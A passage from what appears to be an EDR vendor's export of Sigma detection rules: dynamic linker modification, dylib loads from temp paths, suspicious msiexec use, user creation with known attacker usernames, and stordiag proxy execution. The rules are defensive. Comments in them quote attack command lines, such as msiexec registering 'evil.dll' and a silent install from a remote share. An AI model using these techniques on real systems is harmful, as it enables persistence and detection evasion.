'/opt/sophos-av/engine/_/savscand.1'\n\n exclusion_docker:\n ProcessImage:\n - '/usr/bin/dockerd'\n - '/usr/sbin/dockerd'\n - '/usr/local/bin/dockerd'\n - '/usr/local/bin/docker-init'\n - '/usr/bin/dockerd-current'\n - '/usr/sbin/dockerd-current'\n - '/usr/bin/containerd'\n - '/usr/local/bin/containerd'\n - '/var/lib/rancher/k3s/data/*/bin/containerd'\n - '/var/lib/rancher/rke2/data/*/bin/containerd'\n - '/snap/docker/*/bin/dockerd'\n - '/snap/microk8s/*/bin/containerd'\n - '/usr/bin/dockerd-ce'\n\n exclusion_docker2:\n ProcessImage|endswith: '/bin/dockerd'\n ProcessCommandLine: 'docker-applyLayer *'\n\n exclusion_docker3:\n ProcessCommandLine|contains|all:\n - 'docker-untar'\n - '/var/lib/docker/overlay'\n ProcessParentCommandLine|startswith: '/usr/sbin/dockerd'\n\n exclusion_rootlesskit:\n # /home//bin/rootlesskit --state-dir=/run/user/1022/dockerd-rootless --net=slirp4netns --mtu=65520 --slirp4netns-sandbox=auto --slirp4netns-seccomp=auto --disable-host-loopback --port-driver=builtin --copy-up=/etc --copy-up=/run --propagation=rslave /home//bin/dockerd-rootless.sh\n - ProcessImage:\n - '/usr/bin/rootlesskit'\n - '/home/*/bin/rootlesskit'\n - '/home/*/.bin/rootlesskit'\n - ProcessParentImage:\n - '/usr/bin/rootlesskit'\n - '/home/*/bin/rootlesskit'\n - '/home/*/.bin/rootlesskit'\n\n exclusion_chmod:\n ProcessCommandLine: '/bin/chmod'\n\n exclusion_vmware:\n ProcessCommandLine|contains:\n - 'vmware-config-tools'\n - 'vmware-uninstall-tools.pl'\n\n exclusion_podman:\n ProcessImage: '/usr/bin/podman'\n\n exclusion_qemu:\n ProcessImage: '/usr/bin/qemu-aarch64-static'\n ProcessParentImage: '/usr/bin/qemu-aarch64-static'\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n\n exclusion_alternatives:\n ProcessImage:\n - '/usr/sbin/alternatives'\n - '/usr/bin/update-alternatives'\n\n exclusion_bitdefender:\n ProcessImage: '/opt/bitdefender-security-tools/bin/bdsecd'\n\n exclusion_installphp:\n ProcessCommandLine|startswith: '/bin/sh /usr/local/bin/install-php-extensions'\n\n exclusion_zscaler:\n ProcessCommandLine:\n - './zscaler-linux-*-installer.run'\n - 'sed -i /zscaler/d /etc/ld.so.conf'\n\n exclusion_packagekitd:\n ProcessImage: '/usr/libexec/packagekitd'\n\n exclusion_nvidia:\n ProcessImage:\n - '/usr/bin/nvidia-ctk'\n - '/usr/bin/nvidia-cdi-hook'\n\n exclusion_buildah:\n - ProcessImage: '/usr/bin/buildah'\n - ProcessAncestors|contains: '|/usr/bin/buildah|'\n\n exclusion_crio:\n - ProcessAncestors|contains: '|/usr/bin/crio|'\n - ProcessParentImage: '/usr/bin/crio'\n\n\n condition: selection and not is_read_access and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "fe966a39-d58c-4285-9fc4-25b1b3a10425",
"rule_name": "Dynamic Linker Configuration Modified",
"rule_description": "Detects an attempt to modify the configuration of the dynamic linker (/etc/ld.so.conf).\nThese modifications can be used by attackers to hijack library loading processes, enabling malicious library injection, process monitoring, or the concealment of malicious activities through library preloading.\nIt is recommended to investigate all dynamic linker configuration changes and identify unauthorized library loading attempts.\n",
"rule_creation_date": "2022-11-10",
"rule_modified_date": "2026-03-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1574.006"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "feae5a22-5c3e-491a-8dcf-83c9d04fa8f8",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.296411Z",
"creation_date": "2026-03-23T11:45:35.296413Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.296417Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://cloud.google.com/blog/topics/threat-intelligence/north-korea-supply-chain/?hl=en",
"https://attack.mitre.org/techniques/T1129/"
],
"name": "t1129_dylib_tmp.yml",
"content": "title: Dylib Loaded from a Temporary Path\nid: feae5a22-5c3e-491a-8dcf-83c9d04fa8f8\ndescription: |\n Detects a dylib library being loaded from a temporary folder.\n Adversaries load libraries from a temporary path to extend capabilities of their tools dynamically.\n It is recommended to check the origin of the library to determine its legitimacy.\nreferences:\n - https://cloud.google.com/blog/topics/threat-intelligence/north-korea-supply-chain/?hl=en\n - https://attack.mitre.org/techniques/T1129/\ndate: 2024/09/26\nmodified: 2026/02/23\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1129\n - classification.macOS.Source.LibraryLoaded\nlogsource:\n category: library_event\n product: macos\ndetection:\n selection:\n ImageLoaded|re: '^/private/tmp/[^/]+$'\n\n filter_path:\n ProcessImage|startswith: '/private/tmp/'\n\n exclusion_path:\n Image|startswith:\n - '/Applications/'\n - '/Library/Application Support/'\n - '/private/var/folders/??/*/?/AppTranslocation/'\n - '/system/library/frameworks/audiotoolbox.framework/xpcservices/auhostingservicexpc_arrow.xpc/contents/macos/auhostingservicexpc_arrow'\n - '/opt/homebrew/Cellar/opencode/*/libexec/lib/node_modules/opencode-ai/node_modules/opencode-darwin-arm64/bin/opencode'\n\n exclusion_claude:\n ProcessSignatureSigningId: 'com.anthropic.claude-code'\n ProcessSigned: 'true'\n\n exclusion_orc:\n ImageLoaded|startswith: '/private/tmp/orcexec'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "feae5a22-5c3e-491a-8dcf-83c9d04fa8f8",
"rule_name": "Dylib Loaded from a Temporary Path",
"rule_description": "Detects a dylib library being loaded from a temporary folder.\nAdversaries load libraries from a temporary path to extend capabilities of their tools dynamically.\nIt is recommended to check the origin of the library to determine its legitimacy.\n",
"rule_creation_date": "2024-09-26",
"rule_modified_date": "2026-02-23",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1129"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "fef9352b-f1be-4144-be70-7134db04d446",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.620284Z",
"creation_date": "2026-03-23T11:45:34.620286Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.620290Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Msiexec/",
"https://attack.mitre.org/techniques/T1218/007/"
],
"name": "t1218_007_msiexec.yml",
"content": "title: Suspicious msiexec.exe Execution\nid: fef9352b-f1be-4144-be70-7134db04d446\ndescription: |\n Detects suspicious execution of the legitimate Windows binary msiexec.exe.\n Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\n Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).\n It is recommended to verify the legitimity of the MSI file.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Msiexec/\n - https://attack.mitre.org/techniques/T1218/007/\ndate: 2021/07/09\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218.007\n - attack.privilege_escalation\n - attack.persistence\n - attack.t1546.016\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Msiexec\n - classification.Windows.Behavior.ProxyExecution\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - Image|endswith: 'msiexec.exe'\n - OriginalFileName: 'msiexec.exe'\n\n # Installs the target .MSI file silently\n # msiexec /quiet /i cmd.msi\n selection_install:\n CommandLine|contains|all:\n - ' /quiet '\n - ' /i '\n\n # https://news.sophos.com/en-us/2020/09/17/maze-attackers-adopt-ragnar-locker-virtual-machine-technique/\n # cmd /c msiexec /qn /i \\\\\\frs\\pikujuwusewa.msi\n selection_parent_cmd:\n ParentCommandLine|contains|all:\n - 'cmd'\n - ' /c '\n - ' /qn '\n - ' /i '\n - ' \\\\'\n\n # Calls DLLRegisterServer to register the target DLL\n # msiexec /y \"C:\\folder\\evil.dll\"\n selection_dllregisterserver:\n CommandLine|contains: ' /y '\n\n # This is handled by the rule 6cedca3d-1b27-4809-9533-e910d016c287\n filter_remote:\n CommandLine|contains:\n - ' http://'\n - ' https://'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_directory:\n CommandLine|contains:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n - '?:\\Windows\\CCM\\'\n - '?:\\Program Files\\SMS_CCM\\'\n - '?:\\Windows\\system32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\ProgramData\\'\n - '?:\\Windows\\Installer\\{????????-????-????-????-????????????}\\'\n\n exclusion_commandline1:\n CommandLine|contains:\n - 'hurukai.io PORT=443 PROTO=https KEY='\n - 'hurukai.io PORT=443 PROTO=https SRV_SIG_PUB=* KEY=* PASSWORD=*'\n - ' REINSTALLMODE='\n - '\\Temp\\FortiClientVPN\\FortiClientVPN.msi /quiet /passive /norestart'\n # https://nxlog.co/products/nxlog-community-edition/download?field_pf_product_nid=All\n - '\\nxlog-ce-?.??.????.msi'\n - '\\nxlog-?.??.????_windows_x??.msi'\n - '\\nxlog-trial-?.??.????_windows_x??.msi'\n # /i \"C:\\AppData\\Roaming\\Matrix42\\Universal Agent Framework 1.0.125.0\\install\\Matrix42 Universal Agent Framework Setup 64.msi\" /quiet /norestart /l*v \"C:\\windows\\TEMP\\Matrix42\\Matrix42UniversalAgentFramework\\MSI_UAF_UEM Agent Windows.2108.1.2.0.log\" AI_SETUPEXEPATH=\"C:\\windows\\TEMP\\Matrix42\\Matrix42UniversalAgentFramework\\Matrix42 Universal Agent Framework Setup 64.exe\" SETUPEXEDIR=\"C:\\windows\\TEMP\\Matrix42\\Matrix42UniversalAgentFramework\\\" EXE_CMD_LINE=\"/exenoui /exenoupdates /exelang 0 /noprereqs /quiet /norestart /l*v \"\"C:\\windows\\TEMP\\Matrix42\\Matrix42UniversalAgentFramework\\MSI_UAF_UEM Agent Windows.2108.1.2.0.log\"\" \" AI_FOUND_PREREQS=\".NET Framework 4.0\"\n - '\\Matrix42\\Matrix42UniversalAgentFramework\\'\n # MSIEXEC.EXE /i C:\\PROGRA~3\\Lenovo\\SYSTEM~1\\SESSIO~1\\REPOSI~1\\K9KYB0~1\\x64\\Lenovo Calliope USB Keyboard.msi /qn TRANSFORMS=1033.MST SETUPEXEDIR=C:\\PROGRA~3\\Lenovo\\SYSTEM~1\\SESSIO~1\\REPOSI~1\\K9KYB0~1\\x64 SETUPEXENAME=setup_x64.exe\n - '\\Lenovo\\SYSTEM~1\\SESSIO~1\\REPOSI~1\\'\n\n exclusion_commandline2:\n # Citrix Update TrolleyExpress.exe\n ParentImage: '?:\\Windows\\SysWOW64\\config\\systemprofile\\Citrix\\UpdaterBinaries\\\\????????-????-????-????-????????????\\CitrixReceiver\\Ctx-????????-????-????-????-????????????\\Extract\\TrolleyExpress.exe'\n CommandLine: 'msiexec /i /quiet'\n\n exclusion_commandline3:\n # Webex\n # https://help.webex.com/fr-fr/article/nw5p67g/Installation-de-l%E2%80%99application-|-Webex-et-mise-%C3%A0-jour-automatique#Cisco_Reference.dita_de4f9295-316d-4e1c-8f47-329ddfdb984d\n CommandLine|contains|all:\n - '\\Webex.msi'\n - 'ENABLEOUTLOOKINTEGRATION='\n - 'DEFAULT_THEME='\n - 'AUTOSTART_WITH_WINDOWS='\n - 'ACCEPT_EULA='\n - 'ALLUSERS='\n\n exclusion_commandline4:\n ParentImage: '?:\\Packages\\Plugins\\Microsoft.Azure.Diagnostics.IaaSDiagnostics\\\\*\\DiagnosticsPlugin.exe'\n CommandLine: 'msiexec.exe /quiet /norestart /i ?:\\Packages\\Plugins\\Microsoft.Azure.Diagnostics.IaaSDiagnostics\\\\*\\InstrumentationEngine\\InstrumentationEngine.Installer.msi'\n\n exclusion_parent:\n - ParentImage:\n - '?:\\Program Files\\HarfangLab\\hurukai.exe'\n - '?:\\Windows\\Temp\\{????????-????-????-????-????????????}\\setup.exe'\n - '?:\\ProgramData\\ESET\\RemoteAdministrator\\Agent\\EraAgentApplicationData\\Data\\UpdaterService.exe'\n - '?:\\Program Files\\Microsoft Azure AD Connect Health Sync Agent\\Monitor\\Microsoft.Online.Reporting.MonitoringAgent.Updater.exe'\n - '?:\\Program Files\\Dell\\SupportAssistAgent\\bin\\SupportAssistInstaller.exe'\n - '?:\\Windows\\System32\\drvinst.exe'\n - '?:\\Windows\\CCM\\Ccm32BitLauncher.exe'\n - '?:\\Windows\\SoftwareDistribution\\Download\\Install\\msoledbsql??_x64_???.exe'\n - '?:\\Program Files (x86)\\Microsoft Intune Management Extension\\Microsoft.Management.Services.IntuneWindowsAgent.exe'\n - '?:\\Program Files (x86)\\ManageEngine\\UEMS_Agent\\dcconfig.exe'\n - '?:\\Program Files\\Puppet Labs\\Puppet\\puppet\\bin\\ruby.exe'\n - ParentCommandLine: '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n\n exclusion_grandparent:\n - GrandparentImage:\n - '?:\\Program Files (x86)\\LANDesk\\LDClient\\sdistbat.exe'\n - '?:\\Program Files\\MobiGame\\MobiGameUpdater.exe'\n - '?:\\Windows\\System32\\wuauclt.exe'\n - '?:\\Program Files (x86)\\wapt\\wapt-get.exe'\n - '?:\\Program Files (x86)\\wapt\\waptpython.exe'\n - '?:\\ProgramData\\NinjaRMMAgent\\download\\ninja_splashtop_streamer.exe'\n - '?:\\Program Files\\Puppet Labs\\Puppet\\puppet\\bin\\ruby.exe'\n - '?:\\Program Files (x86)\\Microsoft Intune Management Extension\\Microsoft.Management.Services.IntuneWindowsAgent.exe'\n - '?:\\Program Files\\AMD\\CCC2\\Install\\ccc2_install.exe'\n - '?:\\Windows\\CCM\\Ccm32BitLauncher.exe'\n - GrandparentCommandLine: '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n\n exclusion_ivanti:\n ParentImage|endswith:\n - '\\STPlatformUpdater.exe'\n - '\\STPlatformUpdater64.exe'\n # msiexec.exe /i AgentInstaller.msi /qn INSTALLCOOKIE=1697e81f-d0e9-b141-9cd0-d475dc1e0d1c SERVERURI=https://xxx.domaine.com:3121 ISSUERCERTIFICATE=C:\\WINDOWS\\Temp\\fb72689b-2d4c-3079-a896-7fbca5324b0f\\f5beaf08548237b3a5b5ada06590419b.cer /liwearucmox C:\\Windows\\Temp\\STPlatformInstall_20220629_074830.log REBOOT=ReallySuppress /norestart\n CommandLine|contains|all:\n - 'msiexec.exe /i AgentInstaller.msi /qn '\n - '/liwearucmox'\n - 'SERVERURI='\n - ' REBOOT=ReallySuppress /norestart'\n\n exclusion_ccm:\n ProcessParentCommandLine|startswith: '?:\\WINDOWS\\system32\\cmd.exe /c ?:\\WINDOWS\\ccmcache\\'\n\n exclusion_remote:\n ProcessParentCommandLine: 'msiexec /i \\\\\\\\*'\n\n condition: selection and\n (\n (selection_install and not 1 of exclusion_*) or\n selection_parent_cmd or\n (selection_dllregisterserver and not exclusion_directory)\n ) and not 1 of filter_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "fef9352b-f1be-4144-be70-7134db04d446",
"rule_name": "Suspicious msiexec.exe Execution",
"rule_description": "Detects suspicious execution of the legitimate Windows binary msiexec.exe.\nAdversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).\nIt is recommended to verify the legitimity of the MSI file.\n",
"rule_creation_date": "2021-07-09",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1218.007",
"attack.t1546.016"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ff11817e-b808-44b5-987d-f621e52b3bef",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.070200Z",
"creation_date": "2026-03-23T11:45:34.070202Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.070208Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/malmoeb/status/1569441172061585409",
"https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/",
"https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1",
"https://go.crowdstrike.com/rs/281-OBQ-266/images/2022OverWatchThreatHuntingReport.pdf",
"https://assets.sentinelone.com/sentinellabs22/SentinelLabs-BlackBasta",
"https://mp.weixin.qq.com/s/pd6fUs5TLdBtwUHauclDOQ",
"https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/",
"https://attack.mitre.org/techniques/T1078",
"https://attack.mitre.org/techniques/T1098",
"https://attack.mitre.org/techniques/T1136/"
],
"name": "t1078_suspicious_user_creation_through_net.yml",
"content": "title: Suspicious User Created via net.exe\nid: ff11817e-b808-44b5-987d-f621e52b3bef\ndescription: |\n Detects the execution of net1.exe in order to create suspicious users.\n This is often used by attackers to evade defense and keep persistence.\n This rule detects usernames that have already been used by attackers in the past.\n It is recommended to investigate the parent process for suspicious activities.\nreferences:\n - https://twitter.com/malmoeb/status/1569441172061585409\n - https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/\n - https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1\n - https://go.crowdstrike.com/rs/281-OBQ-266/images/2022OverWatchThreatHuntingReport.pdf\n - https://assets.sentinelone.com/sentinellabs22/SentinelLabs-BlackBasta\n - https://mp.weixin.qq.com/s/pd6fUs5TLdBtwUHauclDOQ\n - https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/\n - https://attack.mitre.org/techniques/T1078\n - https://attack.mitre.org/techniques/T1098\n - https://attack.mitre.org/techniques/T1136/\ndate: 2022/09/28\nmodified: 2025/04/10\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1078\n - attack.t1098\n - attack.persistence\n - attack.t1136\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.AccountManipulation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_net:\n - Image|endswith: '\\net1.exe'\n - OriginalFileName: 'net1.exe'\n selection_user:\n CommandLine|contains: ' user'\n selection_add:\n CommandLine|contains:\n - '/add'\n - '\\add'\n - '-add'\n selection_suspicious_user:\n CommandLine|contains:\n - ' z '\n - ' zz '\n - ' Mysql '\n - ' DefaultAccount '\n - ' DefaultAccount? '\n - ' admina '\n - ' Crackenn '\n - ' krtbgt '\n\n condition: all of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ff11817e-b808-44b5-987d-f621e52b3bef",
"rule_name": "Suspicious User Created via net.exe",
"rule_description": "Detects the execution of net1.exe in order to create suspicious users.\nThis is often used by attackers to evade defense and keep persistence.\nThis rule detects usernames that have already been used by attackers in the past.\nIt is recommended to investigate the parent process for suspicious activities.\n",
"rule_creation_date": "2022-09-28",
"rule_modified_date": "2025-04-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1078",
"attack.t1098",
"attack.t1136"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ff2d57de-576b-48a9-b92d-aee4a563ffe6",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.069468Z",
"creation_date": "2026-03-23T11:45:34.069470Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.069475Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Stordiag/",
"https://attack.mitre.org/techniques/T1218/",
"https://attack.mitre.org/techniques/T1574/002/"
],
"name": "t1218_stordiag.yml",
"content": "title: Proxy Execution via stordiag.exe\nid: ff2d57de-576b-48a9-b92d-aee4a563ffe6\ndescription: |\n Detects a suspicious execution of the Storage Diagnostic Tool (Stordiag.exe) to execute another binary.\n Stordiag.exe executes different programs to perform its diagnostics (systeminfo.exe, fltMC.exe, schtasks.exe,...) but prioritizes executables in its working directories.\n Attackers can proxy the execution of malicious payloads using the stordiag binary to evade detection.\n It is recommended to analyze the process responsible for the execution of stordiag as well as to analyze all child processes for malicious content or actions.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Stordiag/\n - https://attack.mitre.org/techniques/T1218/\n - https://attack.mitre.org/techniques/T1574/002/\ndate: 2022/02/07\nmodified: 2025/01/31\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - attack.t1574.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Stordiag\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n # The following binaries can be spawned by stordiag.exe:\n # - systeminfo.exe\n # - fltMC.exe\n # - schtasks.exe\n # - LogMan.exe # with -collectetw\n # - fsutil.exe # with -checkfsconsistency\n # - cmd.exe # with -checkfsconsistency\n # - CHKDSK.exe # with -checkfsconsistency\n selection:\n - Image|endswith: '\\stordiag.exe'\n - OriginalFileName: 'stordiag.exe'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ff2d57de-576b-48a9-b92d-aee4a563ffe6",
"rule_name": "Proxy Execution via stordiag.exe",
"rule_description": "Detects a suspicious execution of the Storage Diagnostic Tool (Stordiag.exe) to execute another binary.\nStordiag.exe executes different programs to perform its diagnostics (systeminfo.exe, fltMC.exe, schtasks.exe,...) but prioritizes executables in its working directories.\nAttackers can proxy the execution of malicious payloads using the stordiag binary to evade detection.\nIt is recommended to analyze the process responsible for the execution of stordiag as well as to analyze all child processes for malicious content or actions.\n",
"rule_creation_date": "2022-02-07",
"rule_modified_date": "2025-01-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218",
"attack.t1574.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ff540b1f-d494-44b7-9446-7c0443c34d87",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.084409Z",
"creation_date": "2026-03-23T11:45:34.084411Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.084416Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
